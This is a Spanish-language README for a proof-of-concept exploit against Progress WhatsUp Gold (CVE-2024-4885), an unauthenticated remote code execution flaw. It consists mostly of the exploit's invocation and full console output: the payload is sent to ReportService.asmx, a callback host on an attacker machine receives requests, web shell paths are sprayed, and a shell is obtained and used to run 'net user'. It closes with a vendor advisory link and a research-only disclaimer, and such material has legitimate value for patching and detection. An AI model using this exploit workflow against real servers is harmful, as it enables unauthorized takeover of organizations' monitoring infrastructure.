PoC para CVE-2024-4885 Progress WhatsUp Gold GetFileWithoutZip Ejecución remota de código no autenticado (CVE-2024-4885) 
Puede encontrar un análisis de la causa raíz de la vulnerabilidad en mi blog: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/
python3 CVE-2024-4885.py -t http://192.168.0.231:9642 -s 192.168.0.181:1337 -f hax.aspx _______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______ |______ | | | | | | | | | | | | | | | | ____ | |______ |_____| | | | ______| |_____| | | | | | | |_____| | _| __|__ | _| |_____| . | |______ | | | | | (*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885) (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam) (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/ (^_^) Prepare for the Pwnage (^_^) (+) Sending payload to http://192.168.0.231:9642/NmConsole/ReportService.asmx (*) Callback server listening on http://192.168.0.181:1337 (+) Payload sent successfully (*) Checking if target is using HTTPS or HTTP https://192.168.0.231/NmConsole/ (*) Target host: https://192.168.0.231 (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-24.aspx (+) Callback received 192.168.0.231 - - [06/Jul/2024 23:31:30] "GET /Session/Login/?sUsername=admin&sPassword=3,0,0,0,16,0,0,0 HTTP/1.1" 200 - 192.168.0.231 - - [06/Jul/2024 23:31:30] "PUT /api/core/render HTTP/1.1" 200 - (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-25.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-26.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-27.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-28.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-29.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-30.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-31.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-32.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx (+) Web shell found at -> https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx Shell> net user User accounts for ------------------------------------------------------------------------------- Administrator debugger DefaultAccount Guest WDAGUtilityAccount The command completed with one or more errors. Shell>
Actualice a la última versión o mitigue siguiendo las instrucciones del Aviso de progreso
https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024
PecadoSinología
Equipo de invocación
Este software ha sido creado exclusivamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas, excepto donde esté explícitamente autorizado. Los mantenedores del proyecto no son responsables del mal uso del software. Úselo responsablemente.
